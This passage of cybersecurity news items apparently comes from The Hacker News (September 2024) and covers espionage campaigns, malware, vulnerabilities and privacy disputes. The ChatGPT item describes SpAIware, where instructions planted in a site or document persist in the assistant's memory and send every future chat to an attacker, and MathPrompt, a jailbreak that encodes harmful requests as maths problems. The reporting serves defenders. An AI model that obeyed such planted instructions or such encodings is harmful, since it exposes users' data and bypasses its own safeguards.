These Cloudflare Worker URLs, the company noted, act as an intermediary, relaying requests to the actual C2 domain used by the adversary ("aljazeerak[.]online").
Cloudflare said it "observed concerted efforts by SloppyLemming to target Pakistani police departments and other law enforcement organizations," adding "there are indications that the actor has targeted entities involved in the operation and maintenance of Pakistan's sole nuclear power facility."
Some of the other targets of credential harvesting activity encompass Sri Lankan and Bangladeshi government and military organizations, and to a lesser extent, Chinese energy and academic sector entities.
Chinese Hackers Infiltrate U.S. Internet Providers in Cyber Espionage Campaign
26.9.24 APT The Hacker News
Nation-state threat actors backed by Beijing broke into a "handful" of U.S. internet service providers (ISPs) as part of a cyber espionage campaign orchestrated to glean sensitive information, The Wall Street Journal reported Wednesday.
The activity has been attributed to a threat actor that Microsoft tracks as Salt Typhoon, which is also known as FamousSparrow and GhostEmperor.
"Investigators are exploring whether the intruders gained access to Cisco Systems routers, core network components that route much of the traffic on the internet," the publication was quoted as saying, citing people familiar with the matter.
The end goal of the attacks is to gain a persistent foothold within target networks, allowing the threat actors to harvest sensitive data or launch a damaging cyber attack.
GhostEmperor first came to light in October 2021, when Russian cybersecurity company Kasperksy detailed a long-standing evasive operation targeting Southeast Asian targets in order to deploy a rootkit named Demodex.
Targets of the campaign included high-profile entities in Malaysia, Thailand, Vietnam, and Indonesia, in addition to outliers located in Egypt, Ethiopia, and Afghanistan.
As recently as July 2024, Sygnia revealed that an unnamed client was compromised by the threat actor in 2023 to infiltrate one of its business partner's networks.
"During the investigation, several servers, workstations, and users were found to be compromised by a threat actor who deployed various tools to communicate with a set of [command-and-control] servers," the company said. "One of these tools was identified as a variant of Demodex."
The development comes days after the U.S. government said it disrupted a 260,000-device botnet dubbed Raptor Train controlled by a different Beijing-linked hacking crew called Flax Typhoon.
It also represents the latest in a string of Chinese state-sponsored efforts to target telecom, ISPs, and other critical infrastructure sectors.
Google's Shift to Rust Programming Cuts Android Memory Vulnerabilities by 52%
25.9.24 Vulnerebility The Hacker News
Google has revealed that its transition to memory-safe languages such as Rust as part of its secure-by-design approach has led to the percentage of memory-safe vulnerabilities discovered in Android dropping from 76% to 24% over a period of six years.
The tech giant said focusing on Safe Coding for new features not only reduces the overall security risk of a codebase, but also makes the switch more "scalable and cost-effective."
Eventually, this leads to a drop in memory safety vulnerabilities as new memory unsafe development slows down after a certain period of time, and new memory safe development takes over, Google's Jeff Vander Stoep and Alex Rebert said in a post shared with The Hacker News.
Perhaps even more interestingly, the number of memory safety vulnerabilities can also drop notwithstanding an increase in the quantity of new memory unsafe code.
The paradox is explained by the fact that vulnerabilities decay exponentially, with a study finding that a high number of vulnerabilities often reside in new or recently modified code.
"The problem is overwhelmingly with new code, necessitating a fundamental change in how we develop code," Vander Stoep and Rebert noted. "Code matures and gets safer with time, exponentially, making the returns on investments like rewrites diminish over time as code gets older."
Google, which formally announced its plans to support the Rust programming language in Android way back in April 2021, said it began prioritizing transitioning new development to memory-safe languages around 2019.
As a result, the number of memory safety vulnerabilities discovered in the operating system has declined from 223 in 2019 to less than 50 in 2024.
It also goes without saying that much of the decrease in such flaws is down to advancements in the ways devised to combat them, moving from reactive patching to proactive mitigating to proactive vulnerability discovery using tools like Clang sanitizers.
The tech giant further noted that memory safety strategies should evolve even more to prioritize "high-assurance prevention" by incorporating secure-by-design principles that enshrine security into the very foundations.
"Instead of focusing on the interventions applied (mitigations, fuzzing), or attempting to use past performance to predict future security, Safe Coding allows us to make strong assertions about the code's properties and what can or cannot happen based on those properties," Vander Stoep and Rebert said.
That's not all. Google said it is also focusing on offering interoperability between Rust, C++, and Kotlin, instead of code rewrites, as a "practical and incremental approach" to embracing memory-safe languages and ultimately eliminating entire vulnerability classes.
"Adopting Safe Coding in new code offers a paradigm shift, allowing us to leverage the inherent decay of vulnerabilities to our advantage, even in large existing systems," it said.
"The concept is simple: once we turn off the tap of new vulnerabilities, they decrease exponentially, making all of our code safer, increasing the effectiveness of security design, and alleviating the scalability challenges associated with existing memory safety strategies such that they can be applied more effectively in a targeted manner."
The development comes as Google touted increased collaboration with Arm's product security and graphics processing unit (GPU) engineering teams to flag multiple shortcomings and elevate the overall security of the GPU software/firmware stack across the Android ecosystem.
This includes the discovery of two memory issues in Pixel's customization of driver code (CVE-2023-48409 and CVE-2023-48421) and another in Arm Valhall GPU firmware and 5th Gen GPU architecture firmware (CVE-2024-0153).
"Proactive testing is good hygiene as it can lead to the detection and resolution of new vulnerabilities before they're exploited," Google and Arm said.
Mozilla Faces Privacy Complaint for Enabling Tracking in Firefox Without User Consent
25.9.24 Security The Hacker News
Vienna-based privacy non-profit noyb (short for None Of Your Business) has filed a complaint with the Austrian data protection authority (DPA) against Firefox maker Mozilla for enabling a new feature called Privacy Preserving Attribution (PPA) without explicitly seeking users' consent.
"Contrary to its reassuring name, this technology allows Firefox to track user behavior on websites," noyb said. "In essence, the browser is now controlling the tracking, rather than individual websites."
Noyb also called out Mozilla for allegedly taking a leaf out of Google's playbook by "secretly" enabling the feature by default without informing users.
PPA, which is currently enabled in Firefox version 128 as an experimental feature, has its parallels in Google's Privacy Sandbox project in Chrome.
The initiative, now abandoned by Google, sought to replace third-party tracking cookies with a set of APIs baked into the web browser that advertisers can talk to in order to determine users' interests and serve targeted ads.
Put differently, the web browser acts as a middleman that stores information about the different categories that users can be slotted into based on their internet browsing patterns.
PPA, per Mozilla, is a way for sites to "understand how their ads perform without collecting data about individual people," describing it as a "non-invasive alternative to cross-site tracking."
It's also similar to Apple's Privacy Preserving Ad Click Attribution, which allows advertisers to measure the effectiveness of their ad campaigns on the web without compromising on user privacy.
The way PPA works is as follows: Websites that serve ads can ask Firefox to remember the ads in the form of an impression that includes details about the ads themselves, such as the destination website.
If a Firefox user ends up visiting the destination website and performs an action that's deemed valuable by the business – e.g., making an online purchase by clicking on the ad, also called "conversion" – that website can prompt the browser to generate a report.
The generated report is encrypted and submitted anonymously using the Distributed Aggregation Protocol (DAP) to an "aggregation service," after which the results are combined with other similar reports to create a summary such that it makes it impossible to learn too much about any individual.
This, in turn, is made possible by a mathematical framework called differential privacy that enables the sharing of aggregate information about users in a privacy-preserving manner by adding random noise to the results to prevent re-identification attacks.
"PPA is enabled in Firefox starting in version 128," Mozilla notes in a support document. "A small number of sites are going to test this and provide feedback to inform our standardization plans, and help us understand if this is likely to gain traction."
"PPA does not involve sending information about your browsing activities to anyone. Advertisers only receive aggregate information that answers basic questions about the effectiveness of their advertising."
It's this aspect that noyb has found fault with, as it's in violation of the European Union's (E.U.) stringent data protection regulations by enabling PPA by default without seeking users' permissions.
"While this may be less invasive than unlimited tracking, which is still the norm in the US, it still interferes with user rights under the E.U.'s GDPR," the advocacy group said. "In reality, this tracking option doesn't replace cookies either, but is simply an alternative - additional - way for websites to target advertising."
It further noted that a Mozilla developer justified the move by claiming that users cannot make an informed decision and that "explaining a system like PPA would be a difficult task."
"It's a shame that an organization like Mozilla believes that users are too dumb to say yes or no," Felix Mikolasch, data protection lawyer at noyb, said. "Users should be able to make a choice and the feature should have been turned off by default."
Cybersecurity Researchers Warn of New Rust-Based Splinter Post-Exploitation Tool
25.9.24 Exploit The Hacker News
Cybersecurity researchers have flagged the discovery of a new post-exploitation red team tool called Splinter in the wild.
Palo Alto Networks Unit 42 shared its findings after it discovered the program on several customers' systems.
"It has a standard set of features commonly found in penetration testing tools and its developer created it using the Rust programming language," Unit 42's Dominik Reichel said. "While Splinter is not as advanced as other well-known post-exploitation tools like Cobalt Strike, it still presents a potential threat to organizations if it is misused."
Penetration testing tools are often used for red team operations to flag potential security issues in a company's network. However, such adversary simulation tools can also be weaponized by threat actors to their advantage.
Unit 42 said it has not detected any threat actor activity associated with the Splinter tool set. There is no information as yet on who developed the tool.
Artifacts unearthed by the cybersecurity firm reveal that they are "exceptionally large," coming in around 7 MB, primarily owing to the presence of 61 Rust crates within it.
Splinter is no different than other post-exploitation frameworks in that it comes with a configuration that includes information about the command-and-control (C2) server, which is parsed in order to establish contact with the server using HTTPS.
"Splinter implants are controlled by a task-based model, which is common among post-exploitation frameworks," Reichel noted. "It obtains its tasks from the C2 server the attacker has defined."
Some of the functions of the tool include executing Windows commands, running modules via remote process injection, uploading and downloading files, collecting cloud service account info, and deleting itself from the system.
"The increasing variety underscores the importance of staying up to date on prevention and detection capabilities, since criminals are likely to adopt any techniques that are effective for compromising organizations," Reichel said.
The disclosure comes as Deep Instinct detailed two attack methods that could be exploited by threat actors to achieve stealthy code injection and privilege escalation by leveraging an RPC interface in Microsoft Office and a malicious shim, respectively.
"We applied a malicious shim in a process without registering an SDB file on the system," researchers Ron Ben-Yizhak and David Shandalov said. "We effectively bypassed EDR detection by writing to a child process and loading the target DLL from the suspended child process before any EDR hook can be established."
In July 2024, Check Point also shed light on a new process injection technique called Thread Name-Calling that allows to implant of a shellcode into a running process by abusing the API for thread descriptions while bypassing endpoint protection products.
"As new APIs are added to Windows, new ideas for injection techniques are appearing," security researcher Aleksandra "Hasherezade" Doniec said.
"Thread Name-Calling uses some of the relatively new APIs. However, it cannot avoid incorporating older well-known components, such as APC injections – APIs which should always be taken into consideration as a potential threat. Similarly, the manipulation of access rights within a remote process is a suspicious activity."
ChatGPT macOS Flaw Could've Enabled Long-Term Spyware via Memory Function
25.9.24 AI The Hacker News
A now-patched security vulnerability in OpenAI's ChatGPT app for macOS could have made it possible for attackers to plant long-term persistent spyware into the artificial intelligence (AI) tool's memory.
The technique, dubbed SpAIware, could be abused to facilitate "continuous data exfiltration of any information the user typed or responses received by ChatGPT, including any future chat sessions," security researcher Johann Rehberger said.
The issue, at its core, abuses a feature called memory, which OpenAI introduced earlier this February before rolling it out to ChatGPT Free, Plus, Team, and Enterprise users at the start of the month.
What it does is essentially allow ChatGPT to remember certain things across chats so that it saves users the effort of repeating the same information over and over again. Users also have the option to instruct the program to forget something.
"ChatGPT's memories evolve with your interactions and aren't linked to specific conversations," OpenAI says. "Deleting a chat doesn't erase its memories; you must delete the memory itself."
The attack technique also builds on prior findings that involve using indirect prompt injection to manipulate memories so as to remember false information, or even malicious instructions, thereby achieving a form of persistence that survives between conversations.
"Since the malicious instructions are stored in ChatGPT's memory, all new conversation going forward will contain the attackers instructions and continuously send all chat conversation messages, and replies, to the attacker," Rehberger said.
"So, the data exfiltration vulnerability became a lot more dangerous as it now spawns across chat conversations."
In a hypothetical attack scenario, a user could be tricked into visiting a malicious site or downloading a booby-trapped document that's subsequently analyzed using ChatGPT to update the memory.
The website or the document could contain instructions to clandestinely send all future conversations to an adversary-controlled server going forward, which can then be retrieved by the attacker on the other end beyond a single chat session.
Following responsible disclosure, OpenAI has addressed the issue with ChatGPT version 1.2024.247 by closing out the exfiltration vector.
"ChatGPT users should regularly review the memories the system stores about them, for suspicious or incorrect ones and clean them up," Rehberger said.
"This attack chain was quite interesting to put together, and demonstrates the dangers of having long-term memory being automatically added to a system, both from a misinformation/scam point of view, but also regarding continuous communication with attacker controlled servers."
The disclosure comes as a group of academics has uncovered a novel AI jailbreaking technique codenamed MathPrompt that exploits large language models' (LLMs) advanced capabilities in symbolic mathematics to get around their safety mechanisms.
"MathPrompt employs a two-step process: first, transforming harmful natural language prompts into symbolic mathematics problems, and then presenting these mathematically encoded prompts to a target LLM," the researchers pointed out.
The study, upon testing against 13 state-of-the-art LLMs, found that the models respond with harmful output 73.6% of the time on average when presented with mathematically encoded prompts, as opposed to approximately 1% with unmodified harmful prompts.
It also follows Microsoft's debut of a new Correction capability that, as the name implies, allows for the correction of AI outputs when inaccuracies (i.e., hallucinations) are detected.
"Building on our existing Groundedness Detection feature, this groundbreaking capability allows Azure AI Content Safety to both identify and correct hallucinations in real-time before users of generative AI applications encounter them," the tech giant said.
Transportation Companies Hit by Cyberattacks Using Lumma Stealer and NetSupport Malware
25.9.24 Virus The Hacker News
Transportation and logistics companies in North America are the target of a new phishing campaign that delivers a variety of information stealers and remote access trojans (RATs).
The activity cluster, per Proofpoint, makes use of compromised legitimate email accounts belonging to transportation and shipping companies so as to inject malicious content into existing email conversations.
As many as 15 breached email accounts have been identified as used as part of the campaign. It's currently not clear how these accounts are infiltrated in the first place or who is behind the attacks.
"Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport," the enterprise security firm said in an analysis published Tuesday.
"In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2."
The attack chains involve sending messages bearing internet shortcut (.URL) attachments or Google Drive URLs leading to a .URL file that when launched, uses Server Message Block (SMB) to fetch the next-stage payload containing the malware from a remote share.
Some variants of the campaign observed in August 2024 have also latched onto a recently popular technique called ClickFix to trick victims into downloading the DanaBot malware under the pretext of addressing an issue with displaying document content in the web browser.
Specifically, this involves urging users to copy and paste a Base64-encoded PowerShell script into the terminal, thereby triggering the infection process.
"These campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management," Proofpoint said.
"The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company's operations before sending campaigns."
The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS).
It also follows the emergence of a new version of the RomCom RAT, a successor to PEAPOD (aka RomCom 4.0) codenamed SnipBot that's distributed via bogus links embedded within phishing emails. Some aspects of the campaign were previously highlighted by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.
"SnipBot gives the attacker the ability to execute commands and download additional modules onto a victim's system," Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel said.
"The initial payload is always either an executable downloader masked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable."
While systems infected with RomCom have also witnessed ransomware deployments in the past, the cybersecurity company pointed out the absence of this behavior, raising the possibility that the threat behind the malware, Tropical Scorpius (aka Void Rabisu), has shifted from pure financial gain to espionage.
CISA Flags Critical Ivanti vTM Vulnerability Amid Active Exploitation Concerns
25.9.24 Vulnerebility The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting Ivanti Virtual Traffic Manager (vTM) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The vulnerability in question is CVE-2024-7593 (CVSS score: 9.8), which could be exploited by a remote unauthenticated attacker to bypass the authentication of the admin panel and create rogue administrative users.
"Ivanti Virtual Traffic Manager contains an authentication bypass vulnerability that allows a remote, unauthenticated attacker to create a chosen administrator account," CISA said.
The issue was patched by Ivanti in vTM versions 22.2R1, 22.3R3, 22.5R2, 22.6R2, and 22.7R2 in August 2024.
The agency did not reveal any specifics on how the shortcoming is being weaponized in real-world attacks and who may be behind them, but Ivanti had previously noted that a proof-of-concept (PoC) is publicly available.
In light of the latest development, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified flaw by October 15, 2024, to secure their networks.
In recent months, several flaws affecting Ivanti devices have come under active exploitation in the wild, including CVE-2024-8190 and CVE-2024-8963.
The software services provider acknowledged that it's aware of a "limited number of customers" who have been targeted by both the issues.
Data shared by Censys shows that there are 2,017 exposed Ivanti Cloud Service Appliance (CSA) instances online as of September 23, 2024, most of which are located in the U.S. It's currently not known how many of these are actually susceptible.
Necro Android Malware Found in Popular Camera and Browser Apps on Play Store
25.9.24 Virus The Hacker News
Altered versions of legitimate Android apps associated with Spotify, WhatsApp, and Minecraft have been used to deliver a new version of a known malware loader called Necro.
Kaspersky said some of the malicious apps have also been found on the Google Play Store. They have been cumulatively downloaded 11 million times. They include -
Wuta Camera - Nice Shot Always (com.benqu.wuta) - 10+ million downloads
Max Browser-Private & Security (com.max.browser) - 1+ million downloads
As of writing, Max Browser is no longer available for download from the Play Store. Wuta Camera, on the other hand, has been updated (version 6.3.7.138) to remove the malware. The latest version of the app, 6.3.8.148, was released on September 8, 2024.
It's currently not clear how both the apps were compromised with the malware in the first place, although it's believed that a rogue software developer kit (SDK) for integrating advertising capabilities is the culprit.
Necro (not to be confused with a botnet of the same name) was first discovered by the Russian cybersecurity company in 2019 when it was hidden within a popular document scanning app called CamScanner.
CamScanner later blamed the issue on an advertisement SDK provided by a third-party named AdHub that it said contained a malicious module to retrieve next-stage malware from a remote server, essentially acting as a loader for all kinds of malware onto victim devices.
The new version of the malware is no different, although it packs in obfuscation techniques to evade detection, particularly leveraging steganography to hide payloads.
"The downloaded payloads, among other things, could display ads in invisible windows and interact with them, download and execute arbitrary DEX files, install applications it downloaded," Kaspersky researcher Dmitry Kalinin said.
It can also "open arbitrary links in invisible WebView windows and execute any JavaScript code in those, run a tunnel through the victim's device, and potentially subscribe to paid services."
One of the prominent delivery vehicles for Necro is modded versions of popular apps and games that are hosted on unofficial sites and app stores. Once downloaded, the apps initialize a module named Coral SDK, which, in turn, sends an HTTP POST request to a remote server.
The server subsequently responds with a link to a purported PNG image file hosted on adoss.spinsok[.]com, following which the SDK proceeds to extract the main payload – a Base64-encoded Java archive (JAR) file – from it.
Necro's malicious functions are realized through a set of additional modules (aka plugins) that are downloaded from the command-and-control (C2) server, allowing it to perform a wide range of actions on the infected Android device -
NProxy - Create a tunnel through the victim's device
island - Generate a pseudo-random number that's used as a time interval (in milliseconds) between displays of intrusive ads
web - Periodically contact a C2 server and execute arbitrary code with elevated permissions when loading specific links
Cube SDK - A helper module that loads other plugins to handle ads in the background
Tap - Download arbitrary JavaScript code and a WebView interface from the C2 server that are responsible for covertly loading and viewing ads
Happy SDK/Jar SDK - A module that combines NProxy and web modules with some minor differences
The discovery of Happy SDK has raised the possibility that the threat actors behind the campaign are experimenting with a non-modular version as well.
"This suggests that Necro is highly adaptable and can download different iterations of itself, perhaps to introduce new features," Kalinin said.
Telemetry data gathered by Kaspersky shows that it blocked over ten thousand Necro attacks worldwide between August 26 and September 15, 2024, with Russia, Brazil, Vietnam, Ecuador, Mexico, Taiwan, Spain, Malaysia, Italy, and Turkey accounting for the most number of attacks.
"This new version is a multi-stage loader that used steganography to hide the second-stage payload, a very rare technique for mobile malware, as well as obfuscation to evade detection," Kalinin said.
"The modular architecture gives the Trojan's creators a wide range of options for both mass and targeted delivery of loader updates or new malicious modules depending on the infected application."
U.S. Proposes Ban on Connected Vehicles Using Chinese and Russian Tech
24.9.24 BigBrothers The Hacker News
The U.S. Department of Commerce (DoC) said it's proposing a ban on the import or sale of connected vehicles that integrate software and hardware made by foreign adversaries, particularly that of the People's Republic of China (PRC) and Russia.
"The proposed rule focuses on hardware and software integrated into the Vehicle Connectivity System (VCS) and software integrated into the Automated Driving System (ADS)," the Bureau of Industry and Security (BIS) said in a press statement.
"These are the critical systems that, through specific hardware and software, allow for external connectivity and autonomous driving capabilities in connected vehicles."
The agency said nefarious access to such systems could enable adversaries to harvest sensitive data and remotely manipulate cars on American roads.
The proposal extends to all wheeled on-road vehicles such as cars, trucks, and buses. Agricultural and mining vehicles are not included.
The BIS said "certain technologies" from China and Russia pose "undue risk" to U.S. critical infrastructure, as well as those who rely on connected vehicles, leading to a potential scenario that could undermine the national security and privacy of U.S. citizens.
"This rule marks a critical step forward in protecting America's technology supply chains from foreign threats and ensures that connected vehicle technologies are secure from the potential exploitation of entities linked to the PRC and Russia," said Under Secretary of Commerce for Industry and Security Alan F. Estevez.
Pursuant to the ban, the import and sale of vehicles with certain VCS or ADS hardware or software with a nexus to China or Russia will be prohibited.
It also aims to block manufacturers with ties to the PRC or Russia from selling connected vehicles that incorporate VCS hardware or software or ADS software in the U.S., even if the vehicle was made in the country.
"The prohibitions on software would take effect for Model Year 2027 and the prohibitions on hardware would take effect for Model Year 2030, or January 1, 2029 for units without a model year," the BIS said.
In a coordinated statement, the White House said the step is a move to ensure that U.S. automotive supply chains are resilient and secure from foreign threats. It added the increasing connectivity of vehicles to U.S. digital networks creates an environment to gather and exploit sensitive information.
"Certain hardware and software in connected vehicles enable the capture of information about geographic areas or critical infrastructure, and present opportunities for malicious actors to disrupt the operations of infrastructure or the vehicles themselves," the White House also pointed out.
Kaspersky Exits U.S., Automatically Replaces Software With UltraAV, Raising Concerns
24.9.24 Security The Hacker News
Antivirus vendor Kaspersky has formally begun pulling back its offerings in the U.S., migrating existing users to UltraAV, effective September 19, 2024, ahead of its formal exit at the end of the month.
"Kaspersky antivirus customers received a software update facilitating the transition to UltraAV," the company said in a post announcing the move on September 21.
"This update ensured that users would not experience a gap in protection upon Kaspersky's exit from the market."
The Russian company, which was banned from selling its software in the U.S. due to national security concerns, said it "worked closely" with UltraAV to ensure that the standards of security and privacy were maintained after the switch.
However, some users who experienced the update have taken to Kaspersky's forums and Reddit, stating that Kaspersky's software was automatically deleted and replaced by UltraAV without any prior notice.
UltraAV, in an FAQ, said "all Kaspersky U.S. users with a valid email address associated with their accounts received email communication detailing the transition process" starting September 5.
However, it appears that the notice reportedly failed to explicitly state that the switch of software in user systems would be an automatic process.
"I was using Kaspersky, didn't realize they'd be shuffling us off to some rando [antivirus] in September," one user wrote in a post on Reddit. "Nearly had a heart attack when I started my PC today and found a program I didn't download."
A U.S. company, UltraAV is part of Pango Group, which also offers several other VPN apps like UltraVPN, OVPN, and VPN360. It touts more than 25 million active users across its brands, and over 650 million lifetime users.
New Octo2 Android Banking Trojan Emerges with Device Takeover Capabilities
24.9.24 Virus The Hacker News
Cybersecurity researchers have discovered a new version of an Android banking trojan called Octo that comes with improved capabilities to conduct device takeover (DTO) and perform fraudulent transactions.
The new version has been codenamed Octo2 by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding campaigns distributing the malware have been spotted in European countries like Italy, Poland, Moldova, and Hungary.
"The malware developers took actions to increase the stability of the remote actions capabilities needed for Device Takeover attacks," the company said.
Some of the malicious apps containing Octo2 are listed below -
Europe Enterprise (com.xsusb_restore3)
Google Chrome (com.havirtual06numberresources)
NordVPN (com.handedfastee5)
Octo was first flagged by the company in early 2022, describing it as the work of a threat actor who goes by the online aliases Architect and goodluck. It has been assessed to be a "direct descendant" of the Exobot malware originally detected in 2016, which also spawned another variant dubbed Coper in 2021.
"Based on the source code of the banking Trojan Marcher, Exobot was maintained until 2018 targeting financial institutions with a variety of campaigns focused on Turkey, France and Germany as well as Australia, Thailand and Japan," ThreatFabric noted at the time.
"Subsequently, a 'lite' version of it was introduced, named ExobotCompact by its author, the threat actor known as 'android' on dark-web forums."
The emergence of Octo2 is said to have been primarily driven by the leak of the Octo source code earlier this year, leading other threat actors to spawn multiple variants of the malware.
Another major development is Octo's transition to a malware-as-a-service (MaaS) operation, per Team Cymru, enabling the developer to monetize the malware by offering it to cybercriminals who are looking to carry out information theft operations.
"When promoting the update, the owner of Octo announced that Octo2 will be available for users of Octo1 at the same price with early access," ThreatFabric said. "We can expect that the actors that were operating Octo1 will switch to Octo2, thus bringing it to the global threat landscape."
One of the significant improvements to Octo2 is the introduction of a Domain Generation Algorithm (DGA) to create the command-and-control (C2) server name, as well as improving its overall stability and anti-analysis techniques.
The rogue Android apps distributing the malware are created using a known APK binding service called Zombinder, which makes it possible to trojanize legitimate applications such that they retrieve the actual malware (in this case, Octo2) under the guise of installing a "necessary plugin."
"With the original Octo malware's source code already leaked and easily accessible to various threat actors, Octo2 builds on this foundation with even more robust remote access capabilities and sophisticated obfuscation techniques," ThreatFabric said.
"This variant's ability to invisibly perform on-device fraud and intercept sensitive data, coupled with the ease with which it can be customized by different threat actors, raises the stakes for mobile banking users globally."
Telegram Agrees to Share User Data With Authorities for Criminal Investigations
24.9.24 Social The Hacker News
In a major policy reversal, the popular messaging app Telegram has announced it will give users' IP addresses and phone numbers to authorities in response to valid legal requests in an attempt to rein in criminal activity on the platform.
"We've made it clear that the IP addresses and phone numbers of those who violate our rules can be disclosed to relevant authorities in response to valid legal requests," Telegram CEO Pavel Durov said in a post.
To that end, the company now explicitly states -
"If Telegram receives a valid order from the relevant judicial authorities that confirms you're a suspect in a case involving criminal activities that violate the Telegram Terms of Service, we will perform a legal analysis of the request and may disclose your IP address and phone number to the relevant authorities."
Such data disclosures, it said, will be included in its periodic transparency reports. It further noted that the service may collect metadata such as IP address, devices and Telegram apps used, and the history of username changes to tackle spam, abuse, and other violations.
It's worth noting that a previous version of its policy limited user information sharing to cases involving terror suspects: "If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities."
Accompanying the changes is an update to its search feature to remove problematic content from search results and a new mechanism for users to report illegal search terms and material through the @SearchReport bot for subsequent review and removal by a human moderation team.
The update to Telegram's Terms of Service and Privacy Policy is a major volte-face for the company which has refused to police the platform for years, turning it into a major haven for cybercrime and other illegal activities, including drug trafficking, child pornography, and money laundering.
The changes have also been driven by the arrest of Durov in France over allegations that the company turned a blind eye to various crimes flourishing unchecked on the platform. He was subsequently released on bail but has been ordered to stay in the country pending ongoing investigation.
Last week, the Ukrainian government said it was banning the use of Telegram by government officials, military personnel, and other defense and critical infrastructure workers, citing national security concerns.
Critical Flaw in Microchip ASF Exposes IoT Devices to Remote Code Execution Risk
23.9.24 IoT The Hacker News
A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution.
The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF's implementation of the tinydhcp server stemming from a lack of adequate input validation.
"There exists a vulnerability in all publicly available examples of the ASF codebase that allows for a specially crafted DHCP request to cause a stack-based overflow that could lead to remote code execution," CERT Coordination Center (CERT/CC) said in an advisory.
Given that the software is no longer supported and is rooted in IoT-centric code, CERT/CC has warned that the vulnerability is "likely to surface in many places in the wild."
The issue impacts ASF 3.52.0.2574 and all prior versions of the software, with the agency also noting that multiple forks of the tinydhcp software are likely susceptible to the flaw as well.
There are currently no fixes or mitigations to address CVE-2024-7490, barring replacing the tinydhcp service with another one that does not have the same issue.
The development comes as SonicWall Capture Labs detailed a severe zero-click vulnerability affecting MediaTek Wi-Fi chipsets (CVE-2024-20017, CVSS 9.8) that could open the door to remote code execution without requiring any user interaction due to an out-of-bounds write issue.
"The affected versions include MediaTek SDK versions 7.4.0.1 and earlier, as well as OpenWrt 19.07 and 21.02," the company said. "This translates to a large variety of vulnerable devices, including routers and smartphones."
"The vulnerability is a buffer overflow as a result of a length value taken directly from attacker-controlled packet data without bounds checking and placed into a memory copy. This buffer overflow creates an out-of-bounds write."
A patch for the vulnerability was released by MediaTek in March 2024, although the likelihood of exploitation has increased with the public availability of a proof-of-concept (PoC) exploit as of August 30, 2024.
Discord Introduces DAVE Protocol for End-to-End Encryption in Audio and Video Calls
23.9.24 Safety The Hacker News
Popular social messaging platform Discord has announced that it's rolling out a new custom end-to-end encrypted (E2EE) protocol to secure audio and video calls.
The protocol has been dubbed DAVE, short for Discord's audio and video end-to-end encryption ("E2EE A/V").
As part of the change introduced last week, voice and video in DMs, Group DMs, voice channels, and Go Live streams are expected to be migrated to use DAVE.
That said, it's worth noting that messages on Discord will remain unencrypted and are subject to its content moderation approach.
"When we consider adding new privacy features like E2EE A/V, we do not do so in isolation from safety," Discord said. "That is why safety is integrated across our product and policies, and why messages on Discord are unencrypted."
"Messages will still be subject to our content moderation approach, allowing us to continue offering additional safety protections."
DAVE is publicly auditable and has been reviewed by Trail of Bits, with the protocol leveraging WebRTC encoded transforms and Message Layer Security (MLS) for encryption and group key exchange (GKE), respectively.
This allows for media frames, outside of the codec metadata, to be encrypted after they are encoded and decrypted before being decoded on the receiver side.
"Each frame is encrypted or decrypted with a per-sender symmetric key," Discord said. "This key is known to all participants of the audio and video session but crucially is unknown to any outsider who is not a member of the call, including Discord."
The use of MLS, on the other hand, makes it possible for users to join or leave a voice or video session on Discord in such a manner that neither new participants can decrypt media sent before they joined nor leaving members can decrypt any media sent in the future.
"Discord's existing transport encryption for audio and video between the client and our selective forwarding unit (SFU) is retained, ensuring only audio and video from authenticated call participants is forwarded," it noted.
"While the SFU still processes all packets for the call, audio or video data inside each packet is end-to-end encrypted and undecryptable by the SFU."
The development comes days after the GSM Association (GSMA), the governing body that oversees the development of the Rich Communications Services (RCS) protocol, said it's working towards implementing E2EE to secure messages sent between the Android and iOS ecosystems.
New PondRAT Malware Hidden in Python Packages Targets Software Developers
23.9.24 Virus The Hacker News
Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.
PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in attacks related to the 3CX supply chain compromise last year.
Some of these attacks are part of a persistent cyber attack campaign dubbed Operation Dream Job, wherein prospective targets are lured with enticing job offers in an attempt to trick them into downloading malware.
"The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages," Unit 42 researcher Yoav Zemah said, linking the activity with moderate confidence to a threat actor called Gleaming Pisces.
The adversary is also tracked by the wider cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster within the Lazarus Group that's also known for distributing the AppleJeus malware.
It's believed that the end goal of the attacks is to "secure access to supply chain vendors through developers' endpoints and subsequently gain access to the vendors' customers' endpoints, as observed in previous incidents."
The list of malicious packages, now removed from the PyPI repository, is below -
real-ids (893 downloads)
coloredtxt (381 downloads)
beautifultext (736 downloads)
minisound (416 downloads)
The infection chain is fairly simple in that the packages, once downloaded and installed on developer systems, are engineered to execute an encoded next-stage that, in turn, runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server.
Further analysis of PondRAT has revealed similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.
